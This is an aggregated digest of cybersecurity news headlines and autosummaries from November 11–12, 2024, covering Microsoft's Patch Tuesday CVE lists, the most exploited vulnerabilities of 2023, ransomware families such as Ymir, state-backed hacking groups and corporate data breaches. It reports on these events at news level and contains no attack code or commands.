    2024-11-12 https://www.helpnetsecurity.com/2024/11/12/zscaler-zero-trust-segmentation/

    Zscaler announced a Zero Trust Segmentation solution to provide a more secure, agile and cost-effective means to connect users, devices, and workloads across and within globally distributed branches, factories, campuses, data centers, and public clouds. While traditional networks, including SD-WAN and site-to-site VPN, have extended enterprise connectivity to branches and clouds, they have also inadvertently accelerated the spread of ransomware. Although firewalls are used to do segmentation on networks, they add complexity, increase costs, and … More

    The post Zscaler Zero Trust Segmentation prevents lateral movement from ransomware attacks appeared first on Help Net Security.


    5 Ways Behavioral Analytics is Revolutionizing Incident Response

    industry
    2024-11-12 https://thehackernews.com/2024/11/5-ways-behavioral-analytics-is.html
    Behavioral analytics, long associated with threat detection (i.e. UEBA or UBA), is experiencing a renaissance. Once primarily used to identify suspicious activity, it’s now being reimagined as a powerful post-detection technology that enhances incident response processes. By leveraging behavioral insights during alert triage and investigation, SOCs can transform their workflows to become more

    Autosummary: For example, an "impossible travel" alert, which often creates false positives, flags logins from locations that are humanly impossible to reach in a short time (e.g., a New York login followed by one in Singapore five minutes later). By shifting from a front-line detection tool to a post-detection powerhouse, behavioral analytics provides the context needed to distinguish real threats from noise, avoid end-user disruptions, and accelerate response times. Traditional workflows often involve repetitive, manual tasks for each alert, such as digging into historical data, verifying normal patterns, or communicating with end-users.


    Volt Typhoon rebuilds malware botnet following FBI disruption

    exploits
    2024-11-12 https://www.bleepingcomputer.com/news/security/volt-typhoon-rebuilds-malware-botnet-following-fbi-disruption/
    The Chinese state-sponsored hacking group Volt Typhoon has begun to rebuild its "KV-Botnet" malware botnet after it was disrupted by law enforcement in January, according to researchers from SecurityScorecard. [...]

    Autosummary: Their primary strategy involves hacking SOHO routers and networking devices, such as Netgear ProSAFE firewalls, Cisco RV320s, DrayTek Vigor routers, and Axis IP cameras, to install custom malware that establishes covert communication and proxy channels and maintains persistent access to targeted networks.


    New Phishing Tool GoIssue Targets GitHub Developers in Bulk Email Campaigns

    financial
    2024-11-12 https://thehackernews.com/2024/11/new-phishing-tool-goissue-targets.html
    Cybersecurity researchers are calling attention to a new sophisticated tool called GoIssue that can be used to send phishing messages at scale targeting GitHub users. The program, first marketed by a threat actor named cyberdluffy (aka Cyber D’ Luffy) on the Runion forum earlier this August, is advertised as a tool that allows criminal actors to extract email addresses from public GitHub

    Autosummary: SlashNext said the tool marks a "dangerous shift in targeted phishing" that could act as a gateway to source code theft, supply chain attacks, and corporate network breaches via compromised developer credentials.


    North Korean Hackers Target macOS Using Flutter-Embedded Malware

    exploits
    2024-11-12 https://thehackernews.com/2024/11/north-korean-hackers-target-macos-using.html
    Threat actors with ties to the Democratic People’s Republic of Korea (DPRK aka North Korea) have been found embedding malware within Flutter applications, marking the first time this tactic has been adopted by the adversary to infect Apple macOS devices. Jamf Threat Labs, which made the discovery based on artifacts uploaded to the VirusTotal platform earlier this month, said the Flutter-built

    Autosummary: What makes the new malware stand out is the use of Flutter, a cross-platform application development framework, to embed the primary payload written in Dart, while masquerading as a fully functional Minesweeper game.


    D-Link won’t fix critical bug in 60,000 exposed EoL modems

    exploits
    2024-11-12 https://www.bleepingcomputer.com/news/security/d-link-wont-fix-critical-bug-in-60-000-exposed-eol-modems/
    Tens of thousands of exposed D-Link routers that have reached their end-of-life are vulnerable to a critical security issue that allows an unauthenticated remote attacker to change any user’s password and take complete control of the device. [...]

    Autosummary: Although the number of vulnerable devices exposed on the public web is significant, D-Link has made it clear in the past [1, 2] that end-of-life (EoL) devices are not covered by updates, even when critical bugs are concerned.


    Windows 10 KB5046613 update released with fixes for printer bugs

    exploits
    2024-11-12 https://www.bleepingcomputer.com/news/microsoft/windows-10-kb5046613-update-released-with-fixes-for-printer-bugs/
    Microsoft has released the KB5046613 cumulative update for Windows 10 22H2 and Windows 10 21H2, which includes ten changes and fixes, including the new Microsoft account manager on the Start menu and fixes for multi-function printer issues. [...]

    Autosummary: Windows users can install this update by going into Settings, clicking on Windows Update, and manually performing a "Check for Updates." However, as this update is mandatory, it will automatically start installing in Windows once you check for updates. Image: Windows 10 KB5046613 cumulative update preview (Source: BleepingComputer). After installing this update, Windows 10 22H2 will be updated to build 19045.5131 and Windows 10 21H2 will be build 19044.5131.


    Microsoft November 2024 Patch Tuesday fixes 4 zero-days, 91 flaws

    exploits
    2024-11-12 https://www.bleepingcomputer.com/news/microsoft/microsoft-november-2024-patch-tuesday-fixes-4-zero-days-91-flaws/
    Today is Microsoft’s November 2024 Patch Tuesday, which includes security updates for 91 flaws, including four zero-days, two of which are actively exploited. [...]

    Autosummary: The November 2024 Patch Tuesday security updates:
    Tag | CVE ID | CVE Title | Severity
    .NET and Visual Studio | CVE-2024-43499 | .NET and Visual Studio Denial of Service Vulnerability | Important
    .NET and Visual Studio | CVE-2024-43498 | .NET and Visual Studio Remote Code Execution Vulnerability | Critical
    Airlift.microsoft.com | CVE-2024-49056 | Airlift.microsoft.com Elevation of Privilege Vulnerability | Critical
    Azure CycleCloud | CVE-2024-43602 | Azure CycleCloud Remote Code Execution Vulnerability | Important
    LightGBM | CVE-2024-43598 | LightGBM Remote Code Execution Vulnerability | Important
    Microsoft Defender for Endpoint | CVE-2024-5535 | OpenSSL: CVE-2024-5535 SSL_select_next_proto buffer overread | Important
    Microsoft Edge (Chromium-based) | CVE-2024-10826 | Chromium: CVE-2024-10826 Use after free in Family Experiences | Unknown
    Microsoft Edge (Chromium-based) | CVE-2024-10827 | Chromium: CVE-2024-10827 Use after free in Serial | Unknown
    Microsoft Exchange Server | CVE-2024-49040 | Microsoft Exchange Server Spoofing Vulnerability | Important
    Microsoft Graphics Component | CVE-2024-49031 | Microsoft Office Graphics Remote Code Execution Vulnerability | Important
    Microsoft Graphics Component | CVE-2024-49032 | Microsoft Office Graphics Remote Code Execution Vulnerability | Important
    Microsoft Office Excel | CVE-2024-49029 | Microsoft Excel Remote Code Execution Vulnerability | Important
    Microsoft Office Excel | CVE-2024-49026 | Microsoft Excel Remote Code Execution Vulnerability | Important
    Microsoft Office Excel | CVE-2024-49027 | Microsoft Excel Remote Code Execution Vulnerability | Important
    Microsoft Office Excel | CVE-2024-49028 | Microsoft Excel Remote Code Execution Vulnerability | Important
    Microsoft Office Excel | CVE-2024-49030 | Microsoft Excel Remote Code Execution Vulnerability | Important
    Microsoft Office SharePoint | ADV240001 | Microsoft SharePoint Server Defense in Depth Update | None
    Microsoft Office Word | CVE-2024-49033 | Microsoft Word Security Feature Bypass Vulnerability | Important
    Microsoft PC Manager | CVE-2024-49051 | Microsoft PC Manager Elevation of Privilege Vulnerability | Important
    Microsoft Virtual Hard Drive | CVE-2024-38264 | Microsoft Virtual Hard Disk (VHDX) Denial of Service Vulnerability | Important
    Microsoft Windows DNS | CVE-2024-43450 | Windows DNS Spoofing Vulnerability | Important
    Role: Windows Active Directory Certificate Services | CVE-2024-49019 | Active Directory Certificate Services Elevation of Privilege Vulnerability | Important
    Role: Windows Hyper-V | CVE-2024-43633 | Windows Hyper-V Denial of Service Vulnerability | Important
    Role: Windows Hyper-V | CVE-2024-43624 | Windows Hyper-V Shared Virtual Disk Elevation of Privilege Vulnerability | Important
    SQL Server | CVE-2024-48998 | SQL Server Native Client Remote Code Execution Vulnerability | (missing on the page)
    SQL Server | CVE-2024-49002 | SQL Server Native Client Remote Code Execution Vulnerability | Important
    SQL Server | CVE-2024-49013 | SQL Server Native Client Remote Code Execution Vulnerability | Important
    SQL Server | CVE-2024-49014 | SQL Server Native Client Remote Code Execution Vulnerability | Important
    SQL Server | CVE-2024-49011 | SQL Server Native Client Remote Code Execution Vulnerability | Important
    SQL Server | CVE-2024-49012 | SQL Server Native Client Remote Code Execution Vulnerability | Important
    SQL Server | CVE-2024-49015 | SQL Server Native Client Remote Code Execution Vulnerability | Important
    SQL Server | CVE-2024-49018 | SQL Server Native Client Remote Code Execution Vulnerability | Important
    SQL Server | CVE-2024-49021 | Microsoft SQL Server Remote Code Execution Vulnerability | Important
    SQL Server | CVE-2024-49016 | SQL Server Native Client Remote Code Execution Vulnerability | Important
    SQL Server | CVE-2024-49017 | SQL Server Native Client Remote Code Execution Vulnerability | Important
    SQL Server | CVE-2024-49010 | SQL Server Native Client Remote Code Execution Vulnerability | Important
    SQL Server | CVE-2024-49005 | SQL Server Native Client Remote Code Execution Vulnerability | Important
    SQL Server | CVE-2024-49007 | SQL Server Native Client Remote Code Execution Vulnerability | Important
    SQL Server | CVE-2024-49003 | SQL Server Native Client Remote Code Execution Vulnerability | (missing on the page)
    (missing on the page) | (missing on the page) | SMBv3 Server Remote Code Execution Vulnerability | Important
    Windows Task Scheduler | CVE-2024-49039 | Windows Task Scheduler Elevation of Privilege Vulnerability | Important
    Windows Telephony Service | CVE-2024-43628 | Windows Telephony Service Remote Code Execution Vulnerability | Important
    Windows Telephony Service | CVE-2024-43621 | Windows Telephony Service Remote Code Execution Vulnerability | Important
    Windows Telephony Service | CVE-2024-43620 | Windows Telephony Service Remote Code Execution Vulnerability | Important
    Windows Telephony Service | CVE-2024-43627 | Windows Telephony Service Remote Code Execution Vulnerability | Important
    Windows Telephony Service | CVE-2024-43635 | Windows Telephony Service Remote Code Execution Vulnerability | Important
    Windows Telephony Service | CVE-2024-43622 | Windows Telephony Service Remote Code Execution Vulnerability | Important
    Windows Telephony Service | CVE-2024-43626 | Windows Telephony Service Elevation of Privilege Vulnerability | Important
    Windows Update Stack | CVE-2024-43530 | Windows Update Stack Elevation of Privilege Vulnerability | Important
    Windows USB Video Driver | CVE-2024-43643 | Windows USB Video Class System Driver Elevation of Privilege Vulnerability | Important
    Windows USB Video Driver | CVE-2024-43449 | Windows USB Video Class System Driver Elevation of Privilege Vulnerability | Important
    Windows USB Video Driver | CVE-2024-43637 | Windows USB Video Class System Driver Elevation of Privilege Vulnerability | Important
    Windows USB Video Driver | CVE-2024-43634 | Windows USB Video Class System Driver Elevation of Privilege Vulnerability | Important
    Windows USB Video Driver | CVE-2024-43638 | Windows USB Video Class System Driver Elevation of Privilege Vulnerability | Important
    Windows VMSwitch | CVE-2024-43625 | Microsoft Windows VMSwitch Elevation of Privilege Vulnerability | Critical
    Windows Win32 Kernel Subsystem | CVE-2024-49046 | Windows Win32 Kernel Subsystem Elevation of Privilege Vulnerability | Important
    Update 9/11/24: Updated to explain that only three flaws were actively exploited and why CVE-2024-43491 was marked as exploited.


    FBI, CISA, and NSA reveal most exploited vulnerabilities of 2023

    exploits
    2024-11-12 https://www.bleepingcomputer.com/news/security/fbi-cisa-and-nsa-reveal-most-exploited-vulnerabilities-of-2023/
    The FBI, the NSA, and cybersecurity authorities of the Five Eyes intelligence alliance have released today a list of the top 15 routinely exploited vulnerabilities throughout last year. [...] "

    Autosummary:
    - (CVE ID missing) IOS XE Web UI Command Injection
    - CVE-2023-27997 Fortinet FortiOS/FortiProxy SSL-VPN Heap-Based Buffer Overflow
    - CVE-2023-34362 Progress MOVEit Transfer SQL Injection
    - CVE-2023-22515 Atlassian Confluence Data Center/Server Broken Access Control
    - CVE-2021-44228 (Log4Shell) Apache Log4j2 Remote Code Execution
    - CVE-2023-2868 Barracuda Networks ESG Appliance Improper Input Validation
    - CVE-2022-47966 Zoho ManageEngine Multiple Products Remote Code Execution
    - CVE-2023-27350 PaperCut MF/NG Improper Access Control
    - CVE-2020-1472 Microsoft Netlogon Privilege Escalation
    - CVE-2023-42793 JetBrains TeamCity Authentication Bypass
    - CVE-2023-23397 Microsoft Office Outlook Privilege Escalation
    - CVE-2023-49103 ownCloud graphapi Information Disclosure
    CVE-2023-3519, a code injection vulnerability in NetScaler ADC / Gateway that enables attackers to gain remote code execution on unpatched servers, took the first spot after state hackers abused it to breach U.S. critical infrastructure organizations. "


    A cyberattack on payment systems blocked card readers across stores and gas stations in Israel

    ciber
    2024-11-12 https://securityaffairs.com/170823/hacking/cyberattack-payment-systems-israel.html
    A cyberattack in Israel allegedly disrupted communication services, causing widespread malfunction of credit card readers across the country on Sunday. The Jerusalem Post reported that thousands of credit card readers at gas stations and supermarket chains in Israel stopped working on Sunday morning following an alleged DDoS attack that hit the company responsible for […] "

    Autosummary: The attack lasted one hour before being mitigated; it impacted multiple companies across Israel, including the Maccabi health fund, taxi service Gett, food ordering app Wolt, and public transportation payment systems Rav Kav Online and Hop-On. "


    Ymir ransomware, a new stealthy ransomware grows in the wild

    exploits ransomware
    2024-11-12 https://securityaffairs.com/170814/malware/ymir-ransomware-analysis.html
    New Ymir ransomware was deployed in attacks shortly after systems were breached by RustyStealer malware, Kaspersky warns. Kaspersky researchers discovered a new ransomware family, called Ymir ransomware, which attackers deployed after breaching systems via PowerShell commands. Ymir includes detection-evasion features, executing tasks in memory using functions like malloc, memmove, and memcmp. Attackers initially accessed systems […] "

    Autosummary: Ymir ransomware, a new stealthy ransomware grows in the wild. Pierluigi Paganini, November 12, 2024. New Ymir ransomware was deployed in attacks shortly after systems were breached by RustyStealer malware, Kaspersky warns. "


    Microsoft fixes bugs causing Windows Server 2025 blue screens, install issues

    exploits
    2024-11-12 https://www.bleepingcomputer.com/news/microsoft/microsoft-fixes-bugs-causing-windows-server-2025-blue-screens-install-issues/
    Microsoft has fixed several bugs that cause install, upgrade, and Blue Screen of Death (BSOD) issues on Windows Server 2025 devices with a high core count. [...] "

    Autosummary: Set the number of cores per socket to a value that ensures the total number of logical processors is 256 or fewer (Important: the total number of logical processors is calculated by first multiplying the number of sockets by the number of cores per socket and then multiplying that result by the number of logical processors per core.) "


    Microsoft fixes actively exploited zero-days (CVE-2024-43451, CVE-2024-49039)

    exploits
    2024-11-12 https://www.helpnetsecurity.com/2024/11/12/cve-2024-43451-cve-2024-49039/

    November 2024 Patch Tuesday is here, and Microsoft has dropped fixes for 89 new security issues in its various products, two of which – CVE-2024-43451 and CVE-2024-49039 – are actively exploited by attackers. The exploited vulnerabilities (CVE-2024-43451, CVE-2024-49039) CVE-2024-43451 is yet another vulnerability that allows attackers to elevate their privileges on targeted Windows and Windows Server machines by disclosing the user’s NTLMv2 hash, which contains their authentication credentials. The hash can then be used by … More

    The post Microsoft fixes actively exploited zero-days (CVE-2024-43451, CVE-2024-49039) appeared first on Help Net Security.

    "

    Autosummary: Consequently, the attacker could execute commands on any Azure CycleCloud cluster within the instance and, in specific scenarios, compromise administrative credentials,” says Natalie Silva, Lead Cyber Security Engineer at Immersive Labs. “To my knowledge, it’s the third such vulnerability that can disclose a user’s NTLMv2 hash that was exploited in the wild in 2024,” Satnam Narang, Senior Staff Research Engineer at Tenable, told Help Net Security. "


    Microsoft November 2024 Patch Tuesday fixes 4 zero-days, 89 flaws

    exploits
    2024-11-12 https://www.bleepingcomputer.com/news/microsoft/microsoft-november-2024-patch-tuesday-fixes-4-zero-days-89-flaws/
    Today is Microsoft's November 2024 Patch Tuesday, which includes security updates for 89 flaws, including four zero-days, two of which are actively exploited. [...] "

    Autosummary: Tag | CVE ID | CVE Title | Severity
    .NET and Visual Studio | CVE-2024-43499 | .NET and Visual Studio Denial of Service Vulnerability | Important
    .NET and Visual Studio | CVE-2024-43498 | .NET and Visual Studio Remote Code Execution Vulnerability | Critical
    Airlift.microsoft.com | CVE-2024-49056 | Airlift.microsoft.com Elevation of Privilege Vulnerability | Critical
    Azure CycleCloud | CVE-2024-43602 | Azure CycleCloud Remote Code Execution Vulnerability | Important
    LightGBM | CVE-2024-43598 | LightGBM Remote Code Execution Vulnerability | Important
    Microsoft Defender for Endpoint | CVE-2024-5535 | OpenSSL: CVE-2024-5535 SSL_select_next_proto buffer overread | Important
    Microsoft Edge (Chromium-based) | CVE-2024-10826 | Chromium: CVE-2024-10826 Use after free in Family Experiences | Unknown
    Microsoft Edge (Chromium-based) | CVE-2024-10827 | Chromium: CVE-2024-10827 Use after free in Serial | Unknown
    Microsoft Exchange Server | CVE-2024-49040 | Microsoft Exchange Server Spoofing Vulnerability | Important
    Microsoft Graphics Component | CVE-2024-49031 | Microsoft Office Graphics Remote Code Execution Vulnerability | Important
    Microsoft Graphics Component | CVE-2024-49032 | Microsoft Office Graphics Remote Code Execution Vulnerability | Important
    Microsoft Office Excel | CVE-2024-49029 | Microsoft Excel Remote Code Execution Vulnerability | Important
    Microsoft Office Excel | CVE-2024-49026 | Microsoft Excel Remote Code Execution Vulnerability | Important
    Microsoft Office Excel | CVE-2024-49027 | Microsoft Excel Remote Code Execution Vulnerability | Important
    Microsoft Office Excel | CVE-2024-49028 | Microsoft Excel Remote Code Execution Vulnerability | Important
    Microsoft Office Excel | CVE-2024-49030 | Microsoft Excel Remote Code Execution Vulnerability | Important
    Microsoft Office SharePoint | ADV240001 | Microsoft SharePoint Server Defense in Depth Update | None
    Microsoft Office Word | CVE-2024-49033 | Microsoft Word Security Feature Bypass Vulnerability | Important
    Microsoft PC Manager | CVE-2024-49051 | Microsoft PC Manager Elevation of Privilege Vulnerability | Important
    Microsoft Virtual Hard Drive | CVE-2024-38264 | Microsoft Virtual Hard Disk (VHDX) Denial of Service Vulnerability | Important
    Microsoft Windows DNS | CVE-2024-43450 | Windows DNS Spoofing Vulnerability | Important
    Role: Windows Active Directory Certificate Services | CVE-2024-49019 | Active Directory Certificate Services Elevation of Privilege Vulnerability | Important
    Role: Windows Hyper-V | CVE-2024-43633 | Windows Hyper-V Denial of Service Vulnerability | Important
    Role: Windows Hyper-V | CVE-2024-43624 | Windows Hyper-V Shared Virtual Disk Elevation of Privilege Vulnerability | Important
    SQL Server | CVE-2024-48998 | SQL Server Native Client Remote Code Execution Vulnerability | (missing)
    (missing) | (missing) | SMBv3 Server Remote Code Execution Vulnerability | Important
    Windows Task Scheduler | CVE-2024-49039 | Windows Task Scheduler Elevation of Privilege Vulnerability | Important
    Windows Telephony Service | CVE-2024-43628 | Windows Telephony Service Remote Code Execution Vulnerability | Important
    Windows Telephony Service | CVE-2024-43621 | Windows Telephony Service Remote Code Execution Vulnerability | Important
    Windows Telephony Service | CVE-2024-43620 | Windows Telephony Service Remote Code Execution Vulnerability | Important
    Windows Telephony Service | CVE-2024-43627 | Windows Telephony Service Remote Code Execution Vulnerability | Important
    Windows Telephony Service | CVE-2024-43635 | Windows Telephony Service Remote Code Execution Vulnerability | Important
    Windows Telephony Service | CVE-2024-43622 | Windows Telephony Service Remote Code Execution Vulnerability | Important
    Windows Telephony Service | CVE-2024-43626 | Windows Telephony Service Elevation of Privilege Vulnerability | Important
    Windows Update Stack | CVE-2024-43530 | Windows Update Stack Elevation of Privilege Vulnerability | Important
    Windows USB Video Driver | CVE-2024-43643 | Windows USB Video Class System Driver Elevation of Privilege Vulnerability | Important
    Windows USB Video Driver | CVE-2024-43449 | Windows USB Video Class System Driver Elevation of Privilege Vulnerability | Important
    Windows USB Video Driver | CVE-2024-43637 | Windows USB Video Class System Driver Elevation of Privilege Vulnerability | Important
    Windows USB Video Driver | CVE-2024-43634 | Windows USB Video Class System Driver Elevation of Privilege Vulnerability | Important
    Windows USB Video Driver | CVE-2024-43638 | Windows USB Video Class System Driver Elevation of Privilege Vulnerability | Important
    Windows VMSwitch | CVE-2024-43625 | Microsoft Windows VMSwitch Elevation of Privilege Vulnerability | Critical
    Windows Win32 Kernel Subsystem | CVE-2024-49046 | Windows Win32 Kernel Subsystem Elevation of Privilege Vulnerability | Important
    SQL Server | CVE-2024-49002 | SQL Server Native Client Remote Code Execution Vulnerability | Important
    SQL Server | CVE-2024-49013 | SQL Server Native Client Remote Code Execution Vulnerability | Important
    SQL Server | CVE-2024-49014 | SQL Server Native Client Remote Code Execution Vulnerability | Important
    SQL Server | CVE-2024-49011 | SQL Server Native Client Remote Code Execution Vulnerability | Important
    SQL Server | CVE-2024-49012 | SQL Server Native Client Remote Code Execution Vulnerability | Important
    SQL Server | CVE-2024-49015 | SQL Server Native Client Remote Code Execution Vulnerability | Important
    SQL Server | CVE-2024-49018 | SQL Server Native Client Remote Code Execution Vulnerability | Important
    SQL Server | CVE-2024-49021 | Microsoft SQL Server Remote Code Execution Vulnerability | Important
    SQL Server | CVE-2024-49016 | SQL Server Native Client Remote Code Execution Vulnerability | Important
    SQL Server | CVE-2024-49017 | SQL Server Native Client Remote Code Execution Vulnerability | Important
    SQL Server | CVE-2024-49010 | SQL Server Native Client Remote Code Execution Vulnerability | Important
    SQL Server | CVE-2024-49005 | SQL Server Native Client Remote Code Execution Vulnerability | Important
    SQL Server | CVE-2024-49007 | SQL Server Native Client Remote Code Execution Vulnerability | Important
    SQL Server | CVE-2024-49003 | SQL Server Native Client Remote Code Execution Vulnerability | Important
    Update 11/13/24: Changed number of flaws to 89 as we previously included Edge flaws fixed on November 7. "


    How human ingenuity continues to outpace automated security tools

    ransomware
    2024-11-11 https://www.helpnetsecurity.com/2024/11/11/ai-safety-issues/

    10% of security researchers now specialize in AI technology as 48% of security leaders consider AI to be one of the greatest risks to their organizations, according to HackerOne. HackerOne’s report combines perspectives from the researcher community, customers, and security leaders. It explores how security-focused organizations integrate human expertise with technology and AI for a defense-in-depth strategy. AI is a threat and an opportunity 67% of security professionals said an external and unbiased review of … More

    The post How human ingenuity continues to outpace automated security tools appeared first on Help Net Security.

    "

    Autosummary: 30% now hack full-time, up from 24% in 2023, and 44% spend over 20 hours a week hacking, compared to 35% the previous year. "


    4 reasons why veterans thrive as cybersecurity professionals

    ciber
    2024-11-11 https://www.helpnetsecurity.com/2024/11/11/veterans-cybersecurity-professionals/

    Through their past military service, veterans are trained to think like adversaries, often share that mission-driven spirit and excel when working with a team to achieve a larger goal. They develop and champion the unique traits that cybersecurity companies need in prospective talent. These organizations must take note, as tapping veterans for cybersecurity roles can mutually benefit their business and the individuals they hire. Below, I’ll explain four reasons veterans make excellent cybersecurity company employees. … More

    The post 4 reasons why veterans thrive as cybersecurity professionals appeared first on Help Net Security.

    "

    Autosummary: When training, military members constantly simulate real-world combat situations so that, when the attack is real, they already know how they’ll react. Veterans are always oriented against the threat they face, and cybersecurity, like a combat situation, is one of the only fields that poses a constant quasi-state of attack. "


    Setting a security standard: From vulnerability to exposure management

    exploits
    2024-11-11 https://www.helpnetsecurity.com/2024/11/11/exposure-management-transition-video/

    Vulnerability management has been the standard approach to fending off cyber threats for years. Still, it falls short by focusing on a limited number of vulnerabilities, often resolving only 1% to 20% of issues. In 2024, with the average data breach cost rising to $4.88 million, businesses can no longer rely on outdated, reactive practices. Instead, a shift to exposure management is crucial. In this Help Net Security video, Rob Gurzeev, CEO of CyCognito, discusses … More

    The post Setting a security standard: From vulnerability to exposure management appeared first on Help Net Security.

    "

    Autosummary: "


    Cybercriminals Use Excel Exploit to Spread Fileless Remcos RAT Malware

    exploits ciber
    2024-11-11 https://thehackernews.com/2024/11/cybercriminals-use-excel-exploit-to.html
    Cybersecurity researchers have discovered a new phishing campaign that spreads a new fileless variant of known commercial malware called Remcos RAT. Remcos RAT "provides purchases with a wide range of advanced features to remotely control computers belonging to the buyer," Fortinet FortiGuard Labs researcher Xiaopeng Zhang said in an analysis published last week. "However, threat actors have "

    Autosummary: These commands allow the program to harvest files, enumerate and terminate processes, manage system services, edit Windows Registry, execute commands and scripts, capture clipboard content, alter a victim's desktop wallpaper, enable camera and microphone, download additional payloads, record the screen, and even disable keyboard or mouse input. "


    A surge in Pro-Russia cyberattacks after decision to monitor North Korean Troops in Ukraine

    ciber
    2024-11-11 https://securityaffairs.com/170779/hacking/south-korea-claims-pro-russia-actors-ddos-attacks.html
    South Korea claims Pro-Russia actors intensified cyberattacks on national sites after it decided to monitor North Korean troops in Ukraine. South Korea’s government blames pro-Russia threat actors for an intensification of cyberattacks on national sites after it decided to monitor North Korean troops in Ukraine. South Korea reports that over 10,000 North Korean troops are […] "

    Autosummary: A surge in Pro-Russia cyberattacks after decision to monitor North Korean Troops in Ukraine. Pierluigi Paganini, November 11, 2024. South Korea claims Pro-Russia actors intensified cyberattacks on national sites after it decided to monitor North Korean troops in Ukraine. "


    The ROI of Security Investments: How Cybersecurity Leaders Prove It

    ciber
    2024-11-11 https://thehackernews.com/2024/11/the-roi-of-security-investments-how.html
    Cyber threats are intensifying, and cybersecurity has become critical to business operations. As security budgets grow, CEOs and boardrooms are demanding concrete evidence that cybersecurity initiatives deliver value beyond regulation compliance. Just like you wouldn’t buy a car without knowing it was first put through a crash test, security systems must also be validated to confirm their value. "

    Autosummary: The automated platform has built-in content of TTPs for conducting tests, covering techniques like Kerberoasting, network scanning, brute forcing etc., relieving the team from having to create this. Instead of relying solely on expensive, highly-skilled engineers to carry out manual validations across all systems, we could focus our elite teams on high-value, targeted red-teaming exercises. Watch the full on-demand webinar with Shawn Baird, Associate Director of Offensive Security & Red Teaming at DTCC, and Pentera Field CISO, Jason Mar-Tang. We met with Shawn Baird, Associate Director of Offensive Security & Red Teaming at DTCC, to discuss how to effectively communicate the business value of his Security Validation practices and tools to his upper management. "


    Halliburton reports $35 million loss after ransomware attack

    exploits ransomware
    2024-11-11 https://www.bleepingcomputer.com/news/security/halliburton-reports-35-million-loss-after-ransomware-attack/
    Halliburton has revealed that an August ransomware attack has led to $35 million in losses after the breach caused the company to shut down IT systems and disconnect customers. [...] "

    Autosummary: "


    200,000 SelectBlinds customers have their card details skimmed in malware attack

    exploits
    2024-11-11 https://www.bitdefender.com/en-us/blog/hotforsecurity/200-000-selectblinds-customers-card-details-skimmed-malware-attack/
    SelectBlinds, a popular online retailer of blinds and shades, has disclosed a security breach that has impacted 206,238 of its customers. Hackers successfully managed to embed malware onto the company's website, capable of stealing sensitive information, including credit card details, names, addresses, phone numbers, and login credentials. Read more in my article on the Hot for Security blog. "

    Autosummary: "


    THN Recap: Top Cybersecurity Threats, Tools, and Practices (Nov 04 - Nov 10)

    ciber
    2024-11-11 https://thehackernews.com/2024/11/thn-recap-top-cybersecurity-threats_11.html
    ⚠️ Imagine this: the very tools you trust to protect you online—your two-factor authentication, your car’s tech system, even your security software—turned into silent allies for hackers. Sounds like a scene from a thriller, right? Yet, in 2024, this isn’t fiction; it’s the new cyber reality. Today’s attackers have become so sophisticated that they’re using our trusted tools as secret pathways, "

    Autosummary: 🔥 Trending CVEs Recently trending CVEs include: CVE-2024-39719, CVE-2024-39720, CVE-2024-39721, CVE-2024-39722, CVE-2024-43093, CVE-2024-10443, CVE-2024-50387, CVE-2024-50388, CVE-2024-50389, CVE-2024-20418, CVE-2024-5910, CVE-2024-42509, CVE-2024-47460, CVE-2024-33661, CVE-2024-33662. Tips for Organizations: Update and Patch Systems: Immediately apply the latest security updates to all edge devices and firewalls, particularly those from Sophos, to mitigate known vulnerabilities like CVE-2020-12271, CVE-2020-15069, CVE-2020-29574, CVE-2022-1040, and CVE-2022-3236. Over 30 Vulnerabilities Found in IBM Security Verify Access: Nearly three dozen vulnerabilities have been disclosed in IBM Security Verify Access (ISVA) that, if successfully exploited, could allow attackers to escalate privileges, access sensitive information, and compromise the entire authentication infrastructure. An ongoing threat campaign dubbed VEILDrive has been observed taking advantage of legitimate services from Microsoft, including Teams, SharePoint, Quick Assist, and OneDrive, as part of its modus operandi. "India very likely uses its cyber program to advance its national security imperatives, including espionage, counterterrorism, and the country's efforts to promote its global status and counter narratives against India and the Indian government," the Canadian Centre for Cyber Security said. Multiple security vulnerabilities identified in the Mazda Connect Connectivity Master Unit (CMU) infotainment unit (from CVE-2024-8355 through CVE-2024-8360), which is used in several models between 2014 and 2021, could allow for execution of arbitrary code with elevated permissions. "


    Amazon confirms employee data breach after vendor hack

    financial
    2024-11-11 https://www.bleepingcomputer.com/news/security/amazon-confirms-employee-data-breach-after-vendor-hack/
    Amazon confirmed a data breach involving employee information after data allegedly stolen during the May 2023 MOVEit attacks was leaked on a hacking forum. [...] "

    Autosummary: Company | Date Stolen | Number of Employees
    Lenovo | 2023-05 | 45,522
    McDonald's | 2023-05 | 3,295
    HP | 2023-05 | 104,119
    City National Bank | 2023-05 | 9,358
    BT | 2023-05 | 15,347
    dsm-firmenich | 2023-05 | 13,248
    Rush University | 2023-05 | 15,853
    URBN | 2023-05 | 17,553
    Westinghouse | 2023-05 | 18,193
    UBS | 2023-05 | 20,462
    TIAA | 2023-05 | 23,857
    OmnicomGroup | 2023-05 | 37,320
    Bristol-Myers Squibb | 2023-05 | 37,497
    3M | 2023-05 | 48,630
    Schwab | 2023-05 | 49,356
    Leidos | 2023-05 | 52,610
    Canada Post | 2023-05 | 69,860
    Amazon | 2023-05 | 2,861,111
    Delta | 2023-05 | 57,317
    Applied Materials | 2023-05 | 53,170
    Cardinal Health | 2023-05 | 407,437
    US Bank | 2023-05 | 114,076
    fmr.com | 2023-05 | 124,464
    HSBC | 2023-05 | 280,693
    MetLife | 2023-05 | 585,130
    The MOVEit data-theft attacks: The Clop ransomware gang was behind a wave of data theft attacks starting on May 27, 2023. "


    New Ymir ransomware partners with RustyStealer in attacks

    exploits ransomware
    2024-11-11 https://www.bleepingcomputer.com/news/security/new-ymir-ransomware-partners-with-rustystealer-in-attacks/
    A new ransomware family called "Ymir" has been spotted in the wild, being introduced onto systems that were previously compromised by the RustyStealer info-stealer malware. [...] "

    Autosummary: Ymir is a novel Windows ransomware strain that operates entirely from memory, leveraging functions like "malloc," "memmove," and "memcmp," to evade detection. "


    HIBP notifies 57 million people of Hot Topic data breach

    financial
    2024-11-11 https://www.bleepingcomputer.com/news/security/hibp-notifies-57-million-people-of-hot-topic-data-breach/
    Have I Been Pwned warns that an alleged data breach exposed the personal information of 56,904,909 accounts for Hot Topic, Box Lunch, and Torrid customers. [...] "

    Autosummary: According to HIBP, the exposed details include full names, email addresses, dates of birth, phone numbers, physical addresses, purchase history, and partial credit card data for Hot Topic, Box Lunch, and Torrid customers. "


    Amazon discloses employee data breach after May 2023 MOVEit attacks

    financial
    2024-11-11 https://securityaffairs.com/170804/data-breach/amazon-employee-data-breach-may-2023-moveit-attacks.html
